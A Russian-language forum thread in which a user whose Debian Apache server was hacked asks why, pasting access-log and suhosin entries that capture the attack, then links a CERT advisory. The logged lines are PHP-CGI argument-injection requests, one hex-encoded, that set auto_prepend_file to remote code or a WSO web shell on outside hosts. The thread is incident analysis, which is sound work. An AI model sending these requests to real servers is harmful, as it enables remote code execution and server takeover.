стандартный конфиг апача уязвим? -> Форум на Исходниках.Ру

	Наши проекты: Журнал · Discuz!ML · Wiki · DRKB · Помощь проекту

Здравствуйте, Гость ! [3.145.151.141]

Правила!

Пожалуйста, подумайте два! раза перед тем как нажать кнопку Отправить.
Убедительная просьба пользоваться поиском и ИНСТРУКЦИЕЙ, и только потом спрашивать!

Публикация вирусов/эксплоитов в бинарном виде запрещена!
Запрещается размещать прямые ссылки на зараженные сайты! (если хочется предупредить, то исправляйте HTTP://... на ХТТП://...)
Категорически запрещается поиск кряков/варезов/серийников, а также размещение ссылок на серийники/ключи/кряки и т.п.
Запрещается использование оскорбительных выражений в адрес участников коференции, в том числе и в личной переписке.

Модераторы: Rust

Новое голосование

стандартный конфиг апача уязвим? , меня ломанули, не пойму как

Demo_S

Сообщ. #1 , 23.11.13, 19:19

Master

Профиль · PM

Рейтинг (т): 34

стандартный lamp.

есть в дефолтной конфигурации папка cgi-bin , в которой внезапно живет php и php5

недавно ломанули этот сервер. анализ логов показал множество запросов вида

Цитата

"GET /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D\"\"+-
d+open_basedir%3Dnone+-d+auto_prepend_file%3Dhttp%3A%2F%2F192.151.144.234%2Flurk.txt+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n HTTP/1.0" 200 311 "

POST //%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66
%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%2
2+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%6
7%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%
65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1" 200 2122 "-" "-"

и еще такое в /var/log/user.log

Цитата

suhosin[29056]: ALERT-SIMULATION - configured request variable name length limit exceeded - dropped variable '-d_safe_mode=off_-dsuhosin_simulatio
n=on_-ddisable_functions=""_-dopen_basedir=none_-d_cgi_force_redirect=0_-dcgi_redirect_status_env=0_-dallow_url_include=on_-dauto_prepend_file=http://files_xakep_biz/sh
ells/PHP/wso_txt' (attacker '82.221.102.181', file '/usr/lib/cgi-bin/php')

т.е. судя по всему они выключают флагами нужные опции и скармливают свой php-шник напрямую интерпретатору и тот радостно выполняет. как так получается?

сейчас на всякий случай сделал deny all на всю папку /cgi-bin

но получается любой дефолтный апач уязвим? или то у меня карма и кривые руки7

да, debian squeezy, apache/2.2.22 5.3.3-7+squeeze1

Demo_S	Сообщ. #2 , 23.11.13, 20:19
Master Профиль · PM Рейтинг (т): 34	судя по всему вот это http://www.kb.cert.org/vuls/id/520827

0 пользователей читают эту тему (0 гостей и 0 скрытых пользователей)

0 пользователей:

[ Script execution time: 0,0241 ] [ 15 queries used ] [ Generated: 28.04.24, 07:47 GMT ]